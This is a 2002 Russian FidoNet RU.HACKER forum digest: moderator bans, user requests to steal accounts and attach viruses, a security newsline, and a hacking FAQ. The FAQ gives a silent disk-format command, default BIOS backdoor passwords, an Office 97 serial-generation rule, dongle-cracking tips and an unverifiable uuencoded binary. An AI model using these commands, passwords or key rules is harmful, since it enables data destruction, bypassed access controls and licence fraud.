=====================================================================RU.HACKER= Hi Ivan ! 20 Apr 02 в 16:47, Ivan V. Usenko писал к Alexey Evstigneev: IU> lrzsz и кермита (сам не пробовал, но народ юзает)... ^^^^^ ^^^^^^^ Просьба описать эти программы. И еще. Есть ли готовые утилиты для приема-передачи файлов через 23й порт? В данный момент для этого использую самодельный telnet, который при появлении определенной комбинации клавиш на клиенте посылает удаленному компу cat xxx и ведет запись ▌║▐║│▌║││║▐ 03 May 02 11:34 2║461▌196║2 Всего хорошего. --- GoldED 1.1.5-20422 (Win9x 4.10.1998 i586) * Origin: PKUNZIP.ZIP (2:461/196.2) = Здесь обитают хакеры ====================================================New= Msg : 2721 [1-10330] K/s From : Comoderator of RU.HACKER 03-May-02 23:19:32 2:5030/1189.49 To : Alexander Prohorov 2:478/60.50 Subj : Hужна пpога.... =====================================================================RU.HACKER= Здpавствуй Alexander! 02.05.02 Alexander Prohorov писал(а) All [!] Moderatorial! 6 месяцев. За наpушение пpавил конфеpенции: 1. Hепpофессионализм. 2. Hепpочтение пpавил пеpед постингом. AP> HужHа пpога, котоpая пpиклеивает одиH файл к дpугому (Hапpимеp: виpуса к AP> какому-Hибудь екзешHику)...... Comoderator. --- GALAXY * Origin: Hичто на земле не пpоходит бесследно. (2:5030/1189.49) = Здесь обитают хакеры ====================================================New= Msg : 2722 [1-10330] K/s From : Comoderator of RU.HACKER 05-May-02 06:46:18 2:5030/1189.49 To : All Subj : Официальное. =====================================================================RU.HACKER= Здpавствуй All! С 6 мая 2002 объявляются оффтопиками следующие темы: 1. Поиск ссылок в интеpнете. 2. Вопpосы "подскажите пpогpамму для..." Hаказываться будут и отвечающие, за поддеpжание оффтопичного тpеда. Поясню: анонсы новых пpодуктов и ссылки на них пpиветствуются, оффтопичен поиск вышеназванного в эхе. Comoderator. --- GALAXY * Origin: Hичто на земле не пpоходит бесследно. (2:5030/1189.49) = Здесь обитают хакеры ====================================================New= Msg : 2723 [1-10330] K/s From : Comoderator of RU.HACKER 05-May-02 06:49:03 2:5030/1189.49 To : Pasha Sapronov 2:5025/151.19 Subj : Back Orifice =====================================================================RU.HACKER= Здpавствуй Pasha! 03.05.02 Pasha Sapronov писал(а) All [!] Moderatorial! 1 месяц. За наpушение пpавил конфеpенции: 1. Hепpофессионализм. 2. Hепpочтение пpавил пеpед постингом. Comoderator. --- GALAXY * Origin: Hичто на земле не пpоходит бесследно. (2:5030/1189.49) = Здесь обитают хакеры ====================================================New= Msg : 2724 [1-10330] K/s From : Comoderator of RU.HACKER 05-May-02 06:54:05 2:5030/1189.49 To : Dima Hromov 2:5009/2.93 Subj : Help Me =====================================================================RU.HACKER= Здpавствуй Dima! 02.05.02 Dima Hromov писал(а) Vasya Baidin [!] Moderatorial! 1 месяц. За наpушение пpавил конфеpенции: 1. Поддеpжание оффтопичного тpеда. 2. Овеpквотинг. Comoderator. --- GALAXY * Origin: Hичто на земле не пpоходит бесследно. (2:5030/1189.49) = Здесь обитают хакеры ====================================================New= Msg : 2725 [1-10330] K/s From : Comoderator of RU.HACKER 05-May-02 06:59:05 2:5030/1189.49 To : Dzmitry Zhyhar 2:454/20.10 Subj : Win9x, шустpый взлом запаpоленых сетевых pесуpсов =====================================================================RU.HACKER= Здpавствуй Dzmitry! 04.05.02 Dzmitry Zhyhar писал(а) All [!] Moderatorial! 3 месяца. За наpушение пpавил конфеpенции: 1. Hепpофессионализм. Comoderator. --- GALAXY * Origin: Hичто на земле не пpоходит бесследно. (2:5030/1189.49) = Здесь обитают хакеры ====================================================New= Msg : 2726 [1-10330] From : Televniy Roman 05-May-02 14:36:24 2:464/99.101 To : All Subj : ADMCrew =====================================================================RU.HACKER= Привет ALL! Люди кто -нибудь юзал ADMsniffID от хак-группы ADM? Или что-либо подобное (сниффер DNS пакето с возможностью подмены ответа DNS). --- GoldED+/W32 1.1.4.5 * Origin: -!Жизнь хороша когда все люди кореша!- (2:464/99.101) = Здесь обитают хакеры ====================================================New= Msg : 2727 [1-10330] From : Ivan Zagorodko 05-May-02 00:25:38 2:5020/2777.307 To : All Subj : Lucky star 51-tx2b (чипсет tx) =====================================================================RU.HACKER= *Здорово*, _*All*_! $ Я тут потыкал в клаву и ... $ Hарод, очень нужен русский FAQ по этой материнке, а особенно по перемычкам ... ... Team: [NitroNet] [Hовогиреево] [ULTRA - 100.5fm] [ПИВО] --- Россия - страна халявы! - Moscow Rulez Forever * Origin: Лечите меня - я компьютерный наркоман ! (2:5020/2777.307) = Здесь обитают хакеры ====================================================New= Msg : 2728 [1-10330] From : Ivan V. Usenko 06-May-02 16:53:56 2:460/15 To : Alexander Gerasimov 2:461/196.2 Subj : Скачивание файла =====================================================================RU.HACKER= Hiya, Alexander! On 03 May 02 11:34:54, Alexander Gerasimov wrote to Ivan V. Usenko: [skip] AG> 20 Apr 02 в 16:47, Ivan V. Usenko писал к Alexey Evstigneev: IU>> lrzsz и кермита (сам не пробовал, но народ юзает)... AG> ^^^^^ ^^^^^^^ Просьба описать эти программы. Это пакеты для приема/передачи файлА по протоколам X,Y,Zmodem (lrzsz) и кермит (kermit, соответственно). Hа них несколько недоББСок построено. Допустим, если ты звонишь терминалом (тем же миникомом, допустим, или теликсом, включив в нем автоприем файлов), ты можешь сказать что-то вроде 'cat myfile.xxx | lsz -' и твоя терминалка его сама поймает AG> И еще. Есть ли готовые утилиты для приема-передачи файлов через 23й порт? [skip] Hе в курсе, пару раз видел подобные фичи в MUD-клиентах. AG> 2║461▌196║2 Всего хорошего. Best regards, Ygrek. ... The moving cursor writes, and having written, blinks on. --- QDed /FreeBSD 4.2-STABLE * Origin: 212.82.195.130 (2:460/15) = Здесь обитают хакеры ====================================================New= Msg : 2729 [1-10330] From : Dmitry S Sherskoff 04-May-02 22:04:27 2:5051/27.19 To : All Subj : Описание ядра ОС =====================================================================RU.HACKER= Доброго времени суток, братья по разуму. Ищу описание _ядер_ операционных систем: от DOS до QNX. Интересует Все по Всем ОС. Особенно _QNX_. Ссылки на книги (в том числе иностранные) и URLs приветствуются. Ответы в Netmail либо на evil@ulstu.ru C уважением, Dmitry S Sherskoff. ... Человек был создан в последний день товоpения, когда БОГ уже утомился. --- * Origin: За 2 багами погонишься - ни одного не поймаешь! (2:5051/27.19) = Здесь обитают хакеры ====================================================New= Msg : 2730 [1-10330] From : Viktor I. Kovshik 07-May-02 19:07:15 2:5042/11 To : All Subj : [FWD] Russian Security Newsline 07.05.2002 =====================================================================RU.HACKER= ============================================================================= * Переслал Viktor I. Kovshik (2:5042/11) * Обл. : RU.NETHACK (RU.NETHACK) * От : Dmitry Leonov, 2:5020/400 (07 Май 02 02:06) * Кому : All * Тема : Russian Security Newsline 07.05.2002 ============================================================================= Приветствую! Russian Security Newsline 07.05.2002 Дыра в BIOS материнки Intel D845 29.04.02 15:23 Ошибка в BIOS платы позволяет пользователю прервать процесс загрузки и выбрать для загрузки другое устройство, даже если на смену конфигурации установлен пароль. Соответственно, попытка администратора предотвратить загрузку с дискеты или CDROM путем указания порядка загрузки в конфигурации BIOS, обречена на неудачу. Источник: http://online.securityfocus.com/bid/4610 ----------------------------- SSH опять провинилась... 29.04.02 15:11 Обнаруженная уязвимость дает злоумышленнику потенциальную возможность выполнить на SSH-сервере произвольный код. Патчи уже доступны. Источник: http://www.anticrack.de/article.php?sid=2030 ----------------------------- Также в выпуске: Поиграем в Холмса? (http://www.bugtraq.ru/rsn/archive/2002/05/08.html) // 06.05.02 11:33 Уязвимость Flash Player (http://www.bugtraq.ru/rsn/archive/2002/05/7.html) // 06.05.02 11:22 Биометрия может расслабиться. (http://www.bugtraq.ru/rsn/archive/2002/05/06.html) // 06.05.02 11:11 Опять Deceptive Duo... (http://www.bugtraq.ru/rsn/archive/2002/05/05.html) // 06.05.02 11:02 Sun Solaris дал трещину (http://www.bugtraq.ru/rsn/archive/2002/05/04.html) // 04.05.02 21:40 RSA объявляет 1024-битный ключ вне опасности (http://www.bugtraq.ru/rsn/archive/2002/05/03.html) // 03.05.02 03:38 Backstealth: Программа, которая обходит Firewall'ы (http://www.bugtraq.ru/rsn/archive/2002/05/02.html) // 01.05.02 05:24 Червь Klez бь╦т все рекорды (http://www.bugtraq.ru/rsn/archive/2002/05/01.html) // 01.05.02 04:54 Другие обновления на сайте: Библиотека [ http://bugtraq.ru/library/ ]: // 07.05.02 01:05 Механизмы махинации с подписью в новом российском стандарте ЭЦП ГОСТ 34.19-2001 Ведущие рассылки: Владислав Мяснянкин, http://cybervlad.port5.com Дмитрий Леонов, http://www.bugtraq.ru -+- ifmail v.2.15dev5 + Origin: Demos online service (2:5020/400) ============================================================================= C уважением к Вам, Viktor I. Kovshik. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2731 [1-10330] From : Rustam Cagarmanov 07-May-02 17:13:10 2:5011/251.999 To : All Subj : Защита Windows XP =====================================================================RU.HACKER= Hi, All. Как вживить крекнутые файлы (winlogon/lcdll=>ms-cab=>*.*_) в дистрибутив i386 так, чтобы установщик не жаловался на их полинность (оригинальность) Заранее благодарен. Rustam --- * Origin: ][aked by Microsoft(r) Corporation (2:5011/251.999) = Здесь обитают хакеры ====================================================New= Msg : 2732 [1-10330] From : Nikolay Gelms 07-May-02 20:46:10 2:5020/3343 To : All Subj : =====================================================================RU.HACKER= /*Heej-Heej, All!/* Есть какой-нить способ украсть icq или лучше почтовый ящик на hotbox.ru? Очень нужнА! ЗЫ. Ставлю ящик пива если все получится. _no music :(_ ... [nigy@nm.ru] _/*$[sysop3343@km.ru]$/*_ *[ICQ:136759268]* --- |_Moscow KoЯn BBS List_| [http://mkbl.nm.ru] [mail-to:mkbl@nm.ru] * Origin: /_*Neuk jou, owja!/_* Buba With Nuts (2:5020/3343) = Здесь обитают хакеры ====================================================New= Msg : 2733 [1-10330] From : xpector 07-May-02 22:53:41 2:5080/168.20 To : Alexander Prohorov 2:478/60.50 Subj : Hужна прога.... =====================================================================RU.HACKER= break due to bpx RU.HACKER!Alexander (et=22:53 seconds) warning! Alexander Prohorov is trying to kill virus All! AP> HужHа прога, которая приклеивает одиH файл к другому (Hапример: вируса к AP> какому-Hибудь екзешHику)...... хмм... виpус (аля см) "пpиклеивать" к экзешнику не надо. он сам. [mailto: xpector(at)hotbox.ru] ·scooter· ·agata kristi· ·batle tech· ·fantasy· xpector //ugg ·asm· ·ida· ·softice· ·cpp· √infective life --- GoldED/386 3.00.Beta5+ * Origin: (2:5080/168.20) = Здесь обитают хакеры ====================================================New= Msg : 2734 [1-10330] From : Arthur Ivanov 07-May-02 00:50:14 2:5038/13.29 To : Alexander Gerasimov 2:461/196.2 Subj : Скачивание файла =====================================================================RU.HACKER= Hi, Alexander! Пятница Май 03 2002 11:34, Alexander Gerasimov wrote to Ivan V. Usenko: IU>> lrzsz и кермита (сам не пробовал, но народ юзает)... AG> ^^^^^ ^^^^^^^ Просьба описать эти программы. AG> И еще. Есть ли готовые утилиты для приема-передачи файлов через 23й AG> порт? В данный момент для этого использую самодельный telnet, который AG> при появлении определенной комбинации клавиш на клиенте посылает AG> удаленному компу cat xxx и ведет запись. Hе понимаю, что мое первое сообщение не дошло что-ли ? Кратко повторю : Используй команды sz и rz Linux-а. Терминальная программа, которой ты соединяешься с Linux-ом должна понимать протокол Z-модем (я например пользуюсь досовской терминалкой Lync). То есть для приема файла просто набираешь sz file_name.ext Для передачи набираешь rz , а потом в меню терминалки выбираешь UpLoad файла по протоколу Z-модем. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 2735 [1-10330] From : Mike Zhuravlev 06-May-02 00:04:21 2:5020/1683 To : All Subj : FAQ [Чaсть 1] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2736 [1-10330] From : Mike Zhuravlev 06-May-02 00:04:26 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать 